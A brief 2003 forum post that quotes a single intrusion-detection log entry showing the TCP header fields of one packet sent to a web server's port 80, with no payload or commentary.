Screaming Electron Forums

#1 Posted by bsdjunkie, April 29th, 2003

> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20